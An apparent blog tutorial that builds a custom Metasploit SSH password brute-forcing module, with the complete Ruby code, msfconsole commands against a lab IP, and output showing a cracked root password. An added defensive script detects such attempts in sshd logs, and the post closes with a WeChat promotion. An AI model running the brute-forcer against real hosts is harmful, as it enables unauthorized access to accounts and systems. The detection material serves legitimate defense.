# Metasploit: a custom SSH authentication brute-forcer
First we write a module script, ssh_brute_by_binghe.rb, as follows:
```ruby
##
# Author 冰河
# Date 2019-01-12
# Description: custom SSH brute-force module, used to brute-force SSH logins
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/ssh'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  # Supplies the standard brute-force mechanics and options: separate username
  # and password lists, a combined user/pass file, blank passwords, and so on
  include Msf::Auxiliary::AuthBrute

  # Module metadata and options
  def initialize
    super(
      'Name'        => 'SSH Scanner',
      'Description' => %q{
        SSH Brute Tool
      },
      'Author'      => 'binghe',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(22)
      ], self.class)
    # SSH_TIMEOUT is read in run_host below; register it so it has a default
    # instead of being nil
    register_advanced_options(
      [
        OptInt.new('SSH_TIMEOUT', [false, 'Maximum time in seconds to negotiate an SSH session', 30])
      ], self.class)
  end

  def run_host(ip)
    # cred_collection builds the set of credentials to try from the datastore options
    cred_collection = Metasploit::Framework::CredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file: datastore['PASS_FILE'],
      password: datastore['PASSWORD'],
      user_file: datastore['USER_FILE'],
      userpass_file: datastore['USERPASS_FILE'],
      username: datastore['USERNAME'],
      user_as_pass: datastore['USER_AS_PASS'],
    )
    scanner = Metasploit::Framework::LoginScanner::SSH.new(
      host: ip,
      port: datastore['RPORT'],   # the option registered above is RPORT, not PORT
      cred_details: cred_collection,
      proxies: datastore['Proxies'],
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: datastore['SSH_TIMEOUT'],
      framework: framework,
      framework_module: self,
    )
    # scan! drives the scan; it performs every login attempt and yields each result
    scanner.scan! do |result|
      # to_h converts the result into a hash
      credential_data = result.to_h
      # merge the module name and workspace id into credential_data
      credential_data.merge!(
        module_fullname: self.fullname,
        workspace_id: myworkspace_id
      )
      if result.success?
        # valid credential: store it in the database and report it
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)
        print_good "#{ip} - LOGIN SUCCESSFUL: #{result.credential}"
      else
        # invalid credential: pass credential_data to invalidate_login and report it
        invalidate_login(credential_data)
        print_status "#{ip} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
      end
    end
  end
end
```
Next, upload ssh_brute_by_binghe.rb to the /usr/share/metasploit-framework/modules/auxiliary/scanner/ssh directory on Kali.
Before running the module, use Metasploit's msftidy tool to check the script's syntax and style.
On the Kali command line, run:
```shell
/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/ssh/ssh_brute_by_binghe.rb
```
msftidy prints nothing, which means the script passed its checks.
Next, run the ssh_brute_by_binghe.rb module from the msf console (the `use` line selects the module at the path it was uploaded to):
```shell
msfconsole
use auxiliary/scanner/ssh/ssh_brute_by_binghe
set RHOSTS 192.168.109.159
set USER_FILE /root/user
set PASS_FILE /root/pass
run
```
The final output is:
```
[*] 192.168.109.159 - LOGIN FAILED: root:admin (Incorrect: )
[+] 192.168.109.159 - LOGIN SUCCESSFUL: root:admin123
[*] 192.168.109.159 - LOGIN FAILED: admin:123456 (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: admin:admin (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: admin:binghe (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:123456 (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:admin (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:binghe (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
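On the target, every attempt the module reports above leaves a matching `Failed password` / `Accepted password` line in sshd's auth log, so the run is easy to spot from the defender's side. The following Ruby script is an added example, not part of the original post and not Metasploit code: it parses syslog-style sshd lines, counts failures per source IP in a sliding window, and flags both a failure burst and the tell-tale pattern of a successful login that follows recent failures (the `root:admin123` hit above). The log lines, host name `target`, IP addresses, the `year:` used to complete syslog timestamps, and the threshold and window values are all constructed assumptions.

```ruby
require 'time'

# Constructed sample auth.log excerpt (not real data): one source guessing
# passwords for the same users the module run above shows, one legitimate
# key-based login from another host, and one unrelated PAM session line.
SAMPLE_AUTH_LOG = <<~LOG.lines.map(&:chomp).freeze
  Jan 12 10:00:01 target sshd[1201]: Failed password for root from 192.168.109.100 port 51001 ssh2
  Jan 12 10:00:02 target sshd[1202]: Accepted password for root from 192.168.109.100 port 51002 ssh2
  Jan 12 10:00:03 target sshd[1203]: Failed password for admin from 192.168.109.100 port 51003 ssh2
  Jan 12 10:00:04 target sshd[1204]: Failed password for admin from 192.168.109.100 port 51004 ssh2
  Jan 12 10:00:05 target sshd[1205]: Failed password for admin from 192.168.109.100 port 51005 ssh2
  Jan 12 10:00:06 target sshd[1206]: Failed password for invalid user binghe from 192.168.109.100 port 51006 ssh2
  Jan 12 10:00:07 target sshd[1207]: Failed password for invalid user binghe from 192.168.109.100 port 51007 ssh2
  Jan 12 10:00:08 target sshd[1208]: Failed password for invalid user binghe from 192.168.109.100 port 51008 ssh2
  Jan 12 10:30:00 target sshd[1300]: Accepted publickey for deploy from 10.0.0.5 port 40000 ssh2
  Jan 12 10:31:00 target sshd[1301]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
LOG

# sshd's "Failed <method> for [invalid user] <user> from <ip>" and
# "Accepted <method> for <user> from <ip>" messages.
SSHD_AUTH_RE = /\A(?<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+
               (?<outcome>Failed|Accepted)\s+\w+\s+for\s+(?:invalid\s+user\s+)?
               (?<user>\S+)\s+from\s+(?<src>[\d.]+)/x

# Parse one line into an event hash, or nil for lines that are not auth
# outcomes. Syslog timestamps carry no year, so the caller supplies it
# (assumed 2019 here to match the post's date).
def parse_sshd_line(line, year: 2019)
  m = SSHD_AUTH_RE.match(line)
  return nil unless m
  {
    time:    Time.strptime("#{year} #{m[:ts].squeeze(' ')}", '%Y %b %d %H:%M:%S'),
    success: m[:outcome] == 'Accepted',
    user:    m[:user],
    src:     m[:src]
  }
end

# Sliding-window detector. Two alert kinds are produced, in log order:
#   :burst                  - a source reaches +threshold+ failures within +window+ seconds
#   :success_after_failures - a source logs in after one or more failures in the
#                             window, which is what a guessed password looks like
def detect_ssh_bruteforce(lines, threshold: 5, window: 60, year: 2019)
  recent_failures = Hash.new { |h, k| h[k] = [] }   # src -> failure timestamps in window
  alerts = []
  lines.each do |line|
    ev = parse_sshd_line(line, year: year)
    next unless ev
    # drop failures that have aged out of the window for this source
    recent = recent_failures[ev[:src]].select { |t| ev[:time] - t <= window }
    if ev[:success]
      unless recent.empty?
        alerts << { type: :success_after_failures, src: ev[:src], user: ev[:user], failures: recent.size }
      end
    else
      recent << ev[:time]
      alerts << { type: :burst, src: ev[:src], failures: recent.size } if recent.size == threshold
    end
    recent_failures[ev[:src]] = recent
  end
  alerts
end

if __FILE__ == $0
  detect_ssh_bruteforce(SAMPLE_AUTH_LOG).each { |a| puts a.inspect }
end
```

Run against the sample, the script raises a `:success_after_failures` alert for `root` from 192.168.109.100 on the second line and a `:burst` alert once that source reaches five failures; the key-based `deploy` login from 10.0.0.5 produces nothing because no failures precede it. The `:burst` threshold fires once per window rather than on every subsequent failure, which keeps a long password list from flooding the alert stream.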
# Closing remarks
If you think 冰河's writing is worthwhile, please search WeChat for and follow the 「冰河技术」official account, where you can learn high-concurrency, distributed systems, microservices, big data, internet and cloud-native technology with 冰河. The 「冰河技术」account has published a large number of technical series, and every article is packed with substance. Many readers have already used the articles there to ace interviews and move to large companies; others have made a leap in their technical ability and become the technical backbone of their company. If you want to improve your skills as they did, join a big company, and get promoted and better paid, follow the 「冰河技术」account: hard-core technical content every day, so you are no longer at a loss about how to level up.